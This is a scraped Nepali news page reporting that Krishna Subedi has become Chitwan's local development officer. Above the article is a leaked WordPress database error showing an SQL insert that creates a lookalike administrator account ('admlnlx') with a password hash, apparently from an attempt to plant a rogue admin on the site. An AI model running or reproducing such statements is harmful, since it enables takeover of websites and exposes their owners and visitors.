WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BBHR6MUvUIJYDpTt2Ww5GSTarIggO21', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 05:37:39', '', 'admlnlx', 'admlnlx')
चितवन, माघ २६–
जिल्ला विकास समिति चितवनमा नयाँ स्थानीय विकास अधिकारीको रुपमा कृष्ण सुवेदी आउनु भएको छ । उहाँले आजैबाट आफ्नो कार्यभार समेत सम्हाल्नु भएको छ ।
स्थानीय विकास अधिकारी सुवेदी जिल्ला विकास समिति संखुवासभाबाट २१ महिने कार्यभार पुरा गरि चितवन सरुवा हुनु भएको हो । सरकारी सेवामा लागेको सुवेदीको २३ वर्ष भएको छ । नारायणी अनलाईनसंग कुरा गर्दै स्थानीय विकास अधिकारी सुवेदीले आफू सधै सकरात्क पक्षमा अघि बढ्ने भन्दै जिल्लाको विकास निर्माणमा सधै सबैसंग हातेमालो गर्दै अघि बढ्ने बताउनुभयो ।
केहीदिन अघि मात्रै जिविस चितवनलाई नेपालकै पहिलो वातावरण मैत्री बनाउँदै स्थानीय विकास अधिकारी श्रपण कुमार पोखरेल भूमी सुधार तथा व्यवस्था मन्त्रालयमा सरुवा हुनु भएको थियो ।